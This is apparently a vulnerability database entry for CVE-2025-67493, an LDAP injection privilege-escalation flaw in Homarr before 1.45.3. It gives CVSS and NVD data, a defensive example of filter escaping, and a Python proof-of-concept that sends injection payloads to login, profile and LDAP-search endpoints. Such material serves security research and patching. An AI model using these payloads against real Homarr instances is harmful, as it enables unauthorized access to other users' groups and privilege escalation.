Security Vulnerability Report
CVE-2025-67493 CVSS 7.5 HIGH

CVE-2025-67493

Published: 2025-12-17 21:16:16
Last Modified: 2026-01-30 18:32:21

Description

Homarr is an open-source dashboard. Prior to version 1.45.3, a crafted input could be used to escalate privileges and gain access to the groups of other users, because inputs to the LDAP search query were not sanitized. The vulnerability could impact all instances using LDAP authentication where a malicious actor had access to a user account. Version 1.45.3 has a patch for the issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:homarr:homarr:*:*:*:*:*:*:*:* - VULNERABLE
Homarr < 1.45.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67493 PoC - Homarr LDAP Injection Privilege Escalation
# This PoC demonstrates the LDAP injection vulnerability in Homarr < 1.45.3
# Note: This is for educational and authorized testing purposes only

import requests
import json

TARGET_URL = "http://target-homarr-instance.com"
ATTACKER_USERNAME = "attacker"
ATTACKER_PASSWORD = "password123"

# LDAP Injection payloads to test
LDAP_INJECTION_PAYLOADS = [
    # Escape the current user context
    "admin*)(objectClass=*",
    "*)(memberOf=*)",
    # Bypass authentication with wildcard
    "*)(|(objectClass=*))",
    # Enumerate all groups
    "*)(objectClass=person)(memberOf=*",
    # Extract sensitive group memberships
    "*))(|(memberOf=CN=Admin*",
]


def test_ldap_injection():
    """Test for LDAP injection vulnerability in Homarr authentication"""
    session = requests.Session()

    # Login with legitimate credentials first
    login_data = {
        "username": ATTACKER_USERNAME,
        "password": ATTACKER_PASSWORD
    }
    response = session.post(f"{TARGET_URL}/api/auth/login", json=login_data)
    if response.status_code != 200:
        print(f"[-] Login failed: {response.status_code}")
        return False
    print("[+] Successfully authenticated")

    # Test LDAP injection in user profile update
    for payload in LDAP_INJECTION_PAYLOADS:
        profile_data = {
            "username": payload,
            "displayName": f"Test User {payload[:20]}",
            "email": f"test-{hash(payload)}@example.com"
        }
        response = session.put(
            f"{TARGET_URL}/api/user/profile",
            json=profile_data,
            headers={"Content-Type": "application/json"}
        )
        if response.status_code == 200:
            # Check if the response contains unexpected group information
            data = response.json()
            if "memberOf" in str(data) or "groups" in str(data):
                print(f"[!] Potential LDAP Injection found with payload: {payload}")
                print(f"[+] Response may contain unauthorized group data")
                print(f"[+] Response preview: {str(data)[:200]}")
                return True

    # Alternative: Test via LDAP search functionality
    search_payloads = [
        "*",
        "*)*(",
        "admin*",
        "*)(objectClass=*"
    ]
    for search_term in search_payloads:
        response = session.get(
            f"{TARGET_URL}/api/ldap/search",
            params={"query": search_term}
        )
        if response.status_code == 200:
            data = response.json()
            # Check if results exceed expected scope
            if isinstance(data, list) and len(data) > 10:
                print(f"[!] LDAP search returned {len(data)} results for query: {search_term}")
                print(f"[+] This may indicate an injection vulnerability")
                return True

    print("[-] No obvious LDAP injection detected")
    return False


if __name__ == "__main__":
    print("CVE-2025-67493 LDAP Injection Test")
    print("=" * 50)
    test_ldap_injection()
```
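The description attributes the issue to unsanitized input in an LDAP search query. As an added example (not Homarr's code and not the 1.45.3 patch), the code below contrasts string concatenation with RFC 4515 value escaping and shows that escaped input can no longer add filter components; the `uid`/`objectClass` filter shape and all function names are assumptions.

```python
import re

# RFC 4515 section 3: these characters must appear as \XX inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
_LEAF = re.compile(r"\(([A-Za-z][\w-]*)=([^()]*)\)")
_HEX = re.compile(r"\\([0-9a-fA-F]{2})")


def escape_filter_value(value: str) -> str:
    """Escape untrusted text for use as an LDAP filter assertion value."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def unescape_filter_value(value: str) -> str:
    """Reverse \\XX escapes, giving the literal the directory compares against."""
    return _HEX.sub(lambda m: chr(int(m.group(1), 16)), value)


def build_filter_unsafe(username: str) -> str:
    # Vulnerable pattern: concatenation lets ')' and '(' add filter components.
    return f"(&(objectClass=person)(uid={username}))"


def build_filter_safe(username: str) -> str:
    # Hardened pattern: metacharacters become data, the structure stays fixed.
    return f"(&(objectClass=person)(uid={escape_filter_value(username)}))"


def leaf_assertions(ldap_filter: str) -> list[tuple[str, str]]:
    """Return the (attribute, literal value) pairs the filter actually contains."""
    return [(a, unescape_filter_value(v)) for a, v in _LEAF.findall(ldap_filter)]


if __name__ == "__main__":
    # Constructed input with the same shape as the payload strings listed above.
    sample = "admin*)(objectClass=*"
    for build in (build_filter_unsafe, build_filter_safe):
        built = build(sample)
        print(build.__name__, built, leaf_assertions(built), sep="\n  ")
```

A filter built from escaped input always has the two assertions the developer wrote, which also makes the leaf count a cheap regression check for code that assembles filters from request data.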

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67493", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:15.627", "lastModified": "2026-01-30T18:32:21.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Homarr is an open-source dashboard. Prior to version 1.45.3, it was possible to craft an input which allowed privilege escalation and getting access to groups of other users due to missing sanitization of inputs in ldap search query. The vulnerability could impact all instances using ldap authentication where a malicious actor had access to a user account. Version 1.45.3 has a patch for the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-90"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:homarr:homarr:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.45.3", "matchCriteriaId": 
"CC064DC6-491E-4B5B-9D5F-75126BC6EB5C"}]}]}], "references": [{"url": "https://github.com/homarr-labs/homarr/security/advisories/GHSA-59gp-q3xx-489q", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}